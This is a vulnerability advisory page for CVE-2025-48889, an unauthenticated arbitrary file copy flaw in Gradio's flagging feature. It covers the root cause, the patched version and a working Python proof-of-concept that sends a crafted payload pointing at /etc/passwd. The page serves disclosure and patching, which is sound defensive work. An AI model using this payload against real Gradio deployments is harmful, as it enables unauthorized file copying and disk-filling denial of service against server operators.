5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-48889

GHSA ID

GHSA-8jw3-6x8j-v96g

EPSS Score

0.23354%

CWE

CWE-434

Published

5/29/2025

Updated

5/30/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-48889

CVE-2025-48889: Gradio Allows Unauthorized File Copy via Path Manipulation

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.

Description

The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies.

Source: User-controlled path parameter in the flagging functionality JSON payload
Sink: shutil.copy operation in FileData._copy_to_dir() method

The vulnerable code flow:

A JSON payload is sent to the /gradio_api/run/predict endpoint
The path field within FileData object can reference any file on the system
When processing this request, the Component.flag() method creates a GradioDataModel object
The FileData._copy_to_dir() method uses this path without proper validation:

def _copy_to_dir(self, dir: str) -> FileData:
    pathlib.Path(dir).mkdir(exist_ok=True)
    new_obj = dict(self)

    if not self.path:
        raise ValueError("Source file path is not set")
    new_name = shutil.copy(self.path, dir)  # vulnerable sink
    new_obj["path"] = new_name
    return self.__class__(**new_obj)

The lack of validation allows copying any file the Gradio process can read

PoC

The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory:

Setup a Gradio app:

import gradio as gr

def image_classifier(inp):
    return {'cat': 0.2, 'dog': 0.8}

test = gr.Interface(fn=image_classifier, inputs="image", outputs="label")

test.launch(share=True)

Run the PoC:

import requests

url = "https://[your-gradio-app-url]/gradio_api/run/predict"  
headers = {
    "Content-Type": "application/json",  
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" 
}

payload = {
    "data": [
        {
            "path": "/etc/passwd",  
            "url": "[your-gradio-app-url]",
            "orig_name": "network_config", 
            "size": 5000,  
            "mime_type": "text/plain", 
            "meta": {
                "_type": "gradio.FileData"  
            }
        },
        {}  
    ],
    "event_data": None,
    "fn_index": 4, 
    "trigger_id": 11, 
    "session_hash": "test123"  
}

response = requests.post(url, headers=headers, json=payload)
print(f"Status Code: {response.status_code}")
print(f"Response Body: {response.text}")

(GitHub Advisory)

5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-48889

GHSA ID

GHSA-8jw3-6x8j-v96g

EPSS Score

0.23354%

CWE

CWE-434

Published

5/29/2025

Updated

5/30/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
gradio	pip	< 5.31.0	5.31.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability (GHSA-8jw3-6x8j-v96g) allows arbitrary file copying in Gradio's flagging feature due to insufficient path validation. The user-controlled path parameter, sent via a JSON payload to the /gradio_api/run/predict endpoint, is used by the gradio.components.file.FileData._copy_to_dir method in a shutil.copy operation without proper sanitization. This is the direct sink of the vulnerability.

The gradio.blocks.Blocks.preprocess_data function is a crucial part of the execution flow. It handles the data from API requests. In vulnerable versions, this function did not adequately ensure that the user-supplied file path was validated before being processed by the FileData component. The fix, identified in commit 40997002090b0ad7cd1037872523dcdd9bf45bc3, was applied to Blocks.preprocess_data. This patch ensures that data validation (specifically data_model.model_validate) is performed for components like FileData, thus preventing the malicious path from reaching FileData._copy_to_dir unvalidated.

Therefore, gradio.components.file.FileData._copy_to_dir is the function containing the vulnerable shutil.copy operation, and gradio.blocks.Blocks.preprocess_data is the higher-level function that, prior to the patch, failed to prevent unvalidated paths from being processed, making it a key part of the vulnerable pathway. Both functions would likely appear in a runtime profile during the exploitation of this vulnerability.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

*n *r*itr*ry *il* *opy vuln*r**ility in *r**io's *l***in* ***tur* *llows un*ut**nti**t** *tt**k*rs to *opy *ny r*****l* *il* *rom t** s*rv*r's *il*syst*m. W*il* *tt**k*rs **n't r*** t**s* *opi** *il*s, t**y **n **us* *oS *y *opyin* l*r** *il*s (lik*

Reasoning

T** vuln*r**ility (**S*-*jw*-*x*j-v***) *llows *r*itr*ry *il* *opyin* in *r**io's *l***in* ***tur* *u* to insu**i*i*nt p*t* v*li**tion. T** us*r-*ontroll** `p*t*` p*r*m*t*r, s*nt vi* * JSON p*ylo** to t** `/*r**io_*pi/run/pr**i*t` *n*point, is us** *

5.3

Basic Information

Concerned about an active attack path?

CVE-2025-48889: Gradio Allows Unauthorized File Copy via Path Manipulation

Description

PoC

5.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI